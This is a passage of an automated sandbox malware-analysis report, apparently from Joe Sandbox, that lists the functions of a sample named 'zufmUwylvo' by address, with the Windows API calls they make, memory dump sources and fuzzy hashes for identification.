Opcode Fuzzy Hash: 98df77b28d5e02885a81663b7589dbf0ec974faed439cb6d6c7d4d854c849da5
Instruction Fuzzy Hash: FDF18430918A4D8FEBA8DF28D845BE937E1FF95310F04826FE84DC7291DB75A9458B81

Function 00007FF95A53BCF2 Relevance: .5, Instructions: 462COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.11929439531.00007FF95A530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff95a530000_zufmUwylvo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a70f292e910be974b0e4795772357d5c3c7bb3c48358a4dfe90156c0f8d8296
Instruction ID: b3954248e13dec5974e66391ccd9db7ea5e1283781b369ed665ed53c64f96622
Opcode Fuzzy Hash: 2a70f292e910be974b0e4795772357d5c3c7bb3c48358a4dfe90156c0f8d8296
Instruction Fuzzy Hash: 36E1C430908A8D4FEBA8DF28C855BED77D1FF95310F14426ED84DC7291CE78A9458B81

Function 00000125D4015C10 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 240
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 00000125D4015C4B
GetThreadContext.KERNEL32 ref: 00000125D4015DB5

Part of subcall function 00000125D4015A40: GetCurrentThreadId.KERNEL32 ref: 00000125D4015A44

Strings

d<m{8, xrefs: 00000125D4015C1C

Memory Dump Source

Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true

Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd

Similarity

API ID: Thread$Current$Context
String ID: d<m{8
API String ID: 1666949209-753981864
Opcode ID: 196898b9c00e9a2a94215751572aa4ea3ed8279feab0b04f45af8764fe45d318
Instruction ID: 9894714288dd5977749814438e6af2f29509089d0987ff95d62d207a1646ba48
Opcode Fuzzy Hash: 196898b9c00e9a2a94215751572aa4ea3ed8279feab0b04f45af8764fe45d318
Instruction Fuzzy Hash: 15D1BD76209F8886DB709B59E4D43EA7BA1F7C8B84F500116EA8D8BBA5CF3CC551CB40

Function 00000125D4013878 Relevance: 7.5, APIs: 5, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32 ref: 00000125D4013886
GetCurrentProcess.KERNEL32 ref: 00000125D40138B4
VirtualProtectEx.KERNEL32 ref: 00000125D40138D6
GetCurrentProcess.KERNEL32 ref: 00000125D40138F4
VirtualProtectEx.KERNEL32 ref: 00000125D4013915

Memory Dump Source

Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true

Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID:
API String ID: 1092925422-0
Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction ID: 4e976c967fbf569d0e9a24c5d06389c9434e68e04dec2b69616c11e4be67e9dd
Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
Instruction Fuzzy Hash: 9F113C3A705F4483FB149BA1F4942EA6AAAF788B84F840029DE894BB94EF3DC554C704

Function 00007FF95A54C721 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 129
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Process32First.KERNEL32 ref: 00007FF95A54C7B6

Strings

9_Z, xrefs: 00007FF95A54C7F3
9_Z, xrefs: 00007FF95A54C75D

Memory Dump Source

Source File: 00000000.00000002.11929439531.00007FF95A530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff95a530000_zufmUwylvo.jbxd

Similarity

API ID: FirstProcess32
String ID: 9_Z$9_Z
API String ID: 2623510744-3579562880
Opcode ID: 67ebb35bd7d3de506738e44800b4efcbbc818f73b051e4d9a37485f00c4b2816
Instruction ID: 69746be79baeace32d6c379082a2494b2238188e64520bfb55d4342b5ca4cecb
Opcode Fuzzy Hash: 67ebb35bd7d3de506738e44800b4efcbbc818f73b051e4d9a37485f00c4b2816
Instruction Fuzzy Hash: DC41C43290DA198FEB65DB189845BECB3F0EF96320F0401F9C04DD7192DA79B9868F85

Function 00000125D40151B0 Relevance: 4.8, APIs: 3, Instructions: 318
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 00000125D4015236

Memory Dump Source

Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true

Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd

Similarity

API ID: CurrentThread
String ID:
API String ID: 2882836952-0
Opcode ID: 06d11d655de32e38fd8e5a073ca3ca46fe81f5eb7042fdfe4678ea390cd256b7
Instruction ID: 8c0540d1c56d8e9b4c528949a2974bf1262faee44f260c2e89a323b1ff5fef36
Opcode Fuzzy Hash: 06d11d655de32e38fd8e5a073ca3ca46fe81f5eb7042fdfe4678ea390cd256b7
Instruction Fuzzy Hash: 8902DC3621AB8486E760CB95F4907AABBB1F3C5794F500115EA8E8BBA8DF7CC454CF40

Function 00000125D4013AC0 Relevance: 4.6, APIs: 3, Instructions: 64
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualQuery.KERNEL32 ref: 00000125D4013B46
VirtualAlloc.KERNEL32 ref: 00000125D4013B80

Memory Dump Source

Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true

Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd

Similarity

API ID: Virtual$AllocQuery
String ID:
API String ID: 31662377-0
Opcode ID: 6886080a5e420ef5f5b7cbc5977cea8f3533897ae81ff2ee1a15dfd3048d8c27
Instruction ID: ef5f110eb739758346858cf15028b7f672ffd2ea4d96261a09ad2445c4628281
Opcode Fuzzy Hash: 6886080a5e420ef5f5b7cbc5977cea8f3533897ae81ff2ee1a15dfd3048d8c27
Instruction Fuzzy Hash: 6C31C73121AE4881FB70DB95E0D47EA6BA6F384784F900525F6CD8BB98DF7DC5608B44

Function 00000125D4013458 Relevance: 4.5, APIs: 3, Instructions: 43
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleFileNameW.KERNEL32 ref: 00000125D401347A
PathFindFileNameW.SHLWAPI ref: 00000125D4013489

Part of subcall function 00000125D4013930: StrCmpNIW.SHLWAPI ref: 00000125D4013948

Part of subcall function 00000125D4013878: GetModuleHandleW.KERNEL32 ref: 00000125D4013886
Part of subcall function 00000125D4013878: GetCurrentProcess.KERNEL32 ref: 00000125D40138B4
Part of subcall function 00000125D4013878: VirtualProtectEx.KERNEL32 ref: 00000125D40138D6
Part of subcall function 00000125D4013878: GetCurrentProcess.KERNEL32 ref: 00000125D40138F4
Part of subcall function 00000125D4013878: VirtualProtectEx.KERNEL32 ref: 00000125D4013915

CreateThread.KERNEL32 ref: 00000125D40134D7

Part of subcall function 00000125D4011EB4: GetCurrentThread.KERNEL32 ref: 00000125D4011EBF

Memory Dump Source

Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true

Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd

Similarity

API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
String ID:
API String ID: 1683269324-0
Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction ID: 33b71a4d5e236b34fa9084d6c07cd06a7bb3c93a53689d74dbde3233c6243ca2
Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
Instruction Fuzzy Hash: 3D115770626E1983FB2197E5A8C67F92E9BFB58705FD400299A06CD5D4EF3DE0A88250

Function 00000125D4014ED0 Relevance: 4.5, APIs: 3, Instructions: 23
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00000125D4014ED4
VirtualProtect.KERNEL32 ref: 00000125D4014F17
FlushInstructionCache.KERNEL32 ref: 00000125D4014F2C

Memory Dump Source

Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true

Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd

Similarity

API ID: CacheCurrentFlushInstructionProcessProtectVirtual
String ID:
API String ID: 3733156554-0
Opcode ID: 850510bb2ba42cc871c3507ea1c994e32bc1ac022eb00db290021f97f82b562b
Instruction ID: d24e8cee81657e19729eb29018217baec0211f9e7804beeec7bf8cb7addf20ee
Opcode Fuzzy Hash: 850510bb2ba42cc871c3507ea1c994e32bc1ac022eb00db290021f97f82b562b
Instruction Fuzzy Hash: F7F0B235219E48C1D730EB45E4D17DA6BA1E3C87D4F540115BA8E4BB69CF78C5A48B00

Function 00000125D36C2908 Relevance: 1.4, APIs: 1, Instructions: 186memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00000125D36C29AA

Memory Dump Source

Source File: 00000000.00000002.11916036441.00000125D36C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000125D36C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_125d36c0000_zufmUwylvo.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction ID: 6b2c1a00b8653553ce2fa2490080446c6c80b7607cd630d56c9550ff24d4ad75
Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
Instruction Fuzzy Hash: 62612976701A5597EF68CF95D4C07ADB7A2F704BD8F188011DE19877A6DB38E862CB00

Non-executed Functions

Function 00000125D401B50C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

RtlCaptureContext.NTDLL ref: 00000125D401B585
RtlLookupFunctionEntry.NTDLL ref: 00000125D401B59D
RtlVirtualUnwind.NTDLL ref: 00000125D401B5D8
IsDebuggerPresent.KERNEL32 ref: 00000125D401B611
SetUnhandledExceptionFilter.KERNEL32 ref: 00000125D401B61B
UnhandledExceptionFilter.KERNEL32 ref: 00000125D401B626

Strings

d<m{8, xrefs: 00000125D401B529

Memory Dump Source

Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true

Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID: d<m{8
API String ID: 1239891234-753981864
Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction ID: 502145cf45ececc98cc32d7896cfb3bf999c707c81610504cc38a0efc6f4cb61
Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
Instruction Fuzzy Hash: 09316D32205F8486DB60CF75E8803EE77A5F798754F900116EA9D8BBA9DF38C665CB00

Function 00000125D401FEF8 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 328fileCOMMON

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32 ref: 00000125D401FF67
WriteFile.KERNEL32 ref: 00000125D402021E
WriteFile.KERNEL32 ref: 00000125D4020270
GetLastError.KERNEL32 ref: 00000125D4020372
GetLastError.KERNEL32 ref: 00000125D40203D2

Strings

d<m{8, xrefs: 00000125D401FF14

Memory Dump Source

Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true

Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd

Similarity

API ID: ErrorFileLastWrite$ConsoleOutput
String ID: d<m{8
API String ID: 1443284424-753981864
Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction ID: bd0f0f954f12952508b19c15c406acca69733a5ca454d35b34c978088a58b577
Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction Fuzzy Hash: 51E1CE72614B849BE701CFA4D4C43EE7BB2F345788F948116EF4A5BB99DA34D52AC700

Function 00000125D4017E70 Relevance: 10.6, APIs: 7, Instructions: 72COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00000125D4017E8C
RtlCaptureContext.NTDLL ref: 00000125D4017EB9
RtlLookupFunctionEntry.NTDLL ref: 00000125D4017ED3
RtlVirtualUnwind.NTDLL ref: 00000125D4017F14
IsDebuggerPresent.KERNEL32 ref: 00000125D4017F68
SetUnhandledExceptionFilter.KERNEL32 ref: 00000125D4017F89
UnhandledExceptionFilter.KERNEL32 ref: 00000125D4017F94

Memory Dump Source

Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true

Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction ID: c5c876f0e343d0e1e91d5ea7ac371b6ddd6ac3699ed6d38c95a356382de5c7ef
Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
Instruction Fuzzy Hash: 6A315272205F8496EB609FA0E8C07EE77A5F794744F84442ADA4D4BB99EF38C658C710

Function 00000125D4017A40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00000125D4017A6C
GetCurrentThreadId.KERNEL32 ref: 00000125D4017A7A
GetCurrentProcessId.KERNEL32 ref: 00000125D4017A86
QueryPerformanceCounter.KERNEL32 ref: 00000125D4017A96

Strings

d<m{8, xrefs: 00000125D4017A4D

Memory Dump Source

Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true

Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd

Similarity

API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
String ID: d<m{8
API String ID: 2933794660-753981864
Opcode ID: ac8b8696854b531a2c36d8a3483ee891c5ec117b5ea5b6300ddbe8ada65bf13e
Instruction ID: cf439d4adb14c4de8e84c6fd09d963e57d922f91e9611456daab420cecf393ee
Opcode Fuzzy Hash: ac8b8696854b531a2c36d8a3483ee891c5ec117b5ea5b6300ddbe8ada65bf13e
Instruction Fuzzy Hash: 6C112E32201F458BEB108FB0E8D53E437A4F759758F841A21EA6D4ABA4DB38D5A58380

Function 00000125D401BE3C Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 146COMMON

Download Yara Rule

Strings

d<m{8, xrefs: 00000125D401BFE3

Memory Dump Source

Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true

Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd

Similarity

API ID:
String ID: d<m{8
API String ID: 0-753981864
Opcode ID: be94a610b278d4561b7c220ec9190d73b31c2b82deb3cd86083bedb6f088a8c3
Instruction ID: 5d1982be9f2535ef4e9495990b23cdc29b18a9366a2425093dd46d9b840dc784
Opcode Fuzzy Hash: be94a610b278d4561b7c220ec9190d73b31c2b82deb3cd86083bedb6f088a8c3
Instruction Fuzzy Hash: 7A51F432705B9485F7209BB6A9807EE7FE6F785BD4F944214EE588BB95CB38C121CB00

Function 00000125D401BC30 Relevance: 2.7, Strings: 2, Instructions: 165COMMON

Download Yara Rule

Strings

*?, xrefs: 00000125D401BC87
d<m{8, xrefs: 00000125D401BFE3

Memory Dump Source

Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true

Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd

Similarity

API ID:
String ID: *?$d<m{8
API String ID: 0-8612452
Opcode ID: 0f32a7f2b4fad7165c24a511c7a5f2eb758ad1cabc3439966c459bfc2effdee2
Instruction ID: 803e23ea5214624befed8409716cf61326d5ced8ada9b73e1add26e33854777b
Opcode Fuzzy Hash: 0f32a7f2b4fad7165c24a511c7a5f2eb758ad1cabc3439966c459bfc2effdee2
Instruction Fuzzy Hash: B751A472712F9885EF14DFE698816ED6BB2F748BD8F844515EE198BB85EB38C461C300

Function 00000125D4022258 Relevance: 1.7, APIs: 1, Instructions: 232COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32 ref: 00000125D40224B8

Memory Dump Source

Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true

Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 5bf784a0c32a6fdd6608718a34414416974ceff4d88edce5db5c7f7bc0fecdf2
Instruction ID: 452e227fce690c953d8bb3dc8348759480fa7b3692a5b68e12caac357261afc8
Opcode Fuzzy Hash: 5bf784a0c32a6fdd6608718a34414416974ceff4d88edce5db5c7f7bc0fecdf2
Instruction Fuzzy Hash: 1FB11E77610B888BEB15CF69C4C63AC7BA1F344B48F958915DB5D8B7A4CB35D461C700

Function 00000125D36CB030 Relevance: 1.4, Strings: 1, Instructions: 165COMMON

Download Yara Rule

Strings

*?, xrefs: 00000125D36CB087

Memory Dump Source

Source File: 00000000.00000002.11916036441.00000125D36C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000125D36C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_125d36c0000_zufmUwylvo.jbxd

Similarity

API ID:
String ID: *?
API String ID: 0-2564092906
Opcode ID: 0f32a7f2b4fad7165c24a511c7a5f2eb758ad1cabc3439966c459bfc2effdee2
Instruction ID: 1e1f1c287173ab96952c7d400842714987fb631c8e549e0f8343654fc5b33fd4
Opcode Fuzzy Hash: 0f32a7f2b4fad7165c24a511c7a5f2eb758ad1cabc3439966c459bfc2effdee2
Instruction Fuzzy Hash: E551017A710F98A5EF14CFE6D8806ED2BA2F748BD4F444521EE1987B96EB78C461C700

Function 00000125D36CF2F8 Relevance: .3, Instructions: 328COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.11916036441.00000125D36C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000125D36C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_125d36c0000_zufmUwylvo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction ID: 0f4c0ad1586a76b8ecf092645be78aea22934e0f3240f4d66d18082c31dea149
Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
Instruction Fuzzy Hash: E5E1057B714A84AAE700CFB5D4842DD7BB2F3457C8F544116DF4A9BBAADA34C42ACB00

Function 00000125D36C20DC Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.11916036441.00000125D36C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000125D36C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_125d36c0000_zufmUwylvo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction ID: cfe972f10855e67b7834016b969bd754bc800a709a1a43fc3ea7308fd4a11a20
Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
Instruction Fuzzy Hash: 04B1C13A210E58A2EF549FA5D4C07E96BA6F744BC8F485016EE0D937A6DF39CD60CB40

Function 00000125D36D1658 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.11916036441.00000125D36C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000125D36C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_125d36c0000_zufmUwylvo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bf784a0c32a6fdd6608718a34414416974ceff4d88edce5db5c7f7bc0fecdf2
Instruction ID: af6f81f3fe1e2f7fade7f214ce2911a3dbd5a07a95afbe4fd348357636b7dcaa
Opcode Fuzzy Hash: 5bf784a0c32a6fdd6608718a34414416974ceff4d88edce5db5c7f7bc0fecdf2
Instruction Fuzzy Hash: 88B1707B600B98CBEB55CF69D48639C37A1F384B88F188912DB5E877A5CB79C461CB00

Function 00007FF95A53127D Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.11929439531.00007FF95A530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF95A530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff95a530000_zufmUwylvo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e95e74bf35bf9d925a6b7a4db2fe25d2d051f56200e857b6c163f6463b9713f3
Instruction ID: 1a607e1af956ba92901dce9887082fa44efb8006a8ec553f522e843b6fe88fa8
Opcode Fuzzy Hash: e95e74bf35bf9d925a6b7a4db2fe25d2d051f56200e857b6c163f6463b9713f3
Instruction Fuzzy Hash: 5E51A62792C27515D705BBBDB8856FEBF58CF8373174400F7E288C9487B9453A8682E4

Function 00000125D36CB23C Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.11916036441.00000125D36C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000125D36C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_125d36c0000_zufmUwylvo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be94a610b278d4561b7c220ec9190d73b31c2b82deb3cd86083bedb6f088a8c3
Instruction ID: e634bdd9a47cdc48deb6309890f1b97a02d442f09301ee29ad7737adafb23816
Opcode Fuzzy Hash: be94a610b278d4561b7c220ec9190d73b31c2b82deb3cd86083bedb6f088a8c3
Instruction Fuzzy Hash: F9510536704B9464FB209BB6E8806DE7FA6B740BD4F144214EE5887BAACB78C521CB00

Function 00000125D36D14A0 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.11916036441.00000125D36C0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000125D36C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_125d36c0000_zufmUwylvo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c472934a709f1b1001af0d924fa8e09930e5dba58a63be07c7f312c63124a0d7
Instruction ID: 6d6bd805ba37be457c298fac1e538c09b53a64c94c33d09313ebb7d363667251
Opcode Fuzzy Hash: c472934a709f1b1001af0d924fa8e09930e5dba58a63be07c7f312c63124a0d7
Instruction Fuzzy Hash: AAF062B57146A89AEBA49F68B88275977E1F708384F848419D689C3B04D23C8070DF04

Function 00000125D4023218 Relevance: .0, Instructions: 3COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.11926716823.00000125D4010000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000125D4010000, based on PE: true

Associated: 00000000.00000002.11926716823.00000125D402A000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D402C000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.11926716823.00000125D4035000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_125d4010000_zufmUwylvo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22443753de477045bc04e8fae9bbe208e9ed38c4b700908505935cb619c927f3
Instruction ID: c7ef1e30b7cabfc2fe9d54dffa2f8fdd7e4f37eed1b277cc189839f41bf51811
Opcode Fuzzy Hash: 22443753de477045bc04e8fae9bbe208e9ed38c4b700908505935cb619c927f3
Instruction Fuzzy Hash:

Function 00000125D4011650 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00000125D401165B
RtlAllocateHeap.NTDLL ref: 00000125D401166A

Part of subcall function 00000125D4011274: GetProcessHeap.KERNEL32 ref: 00000125D401127A
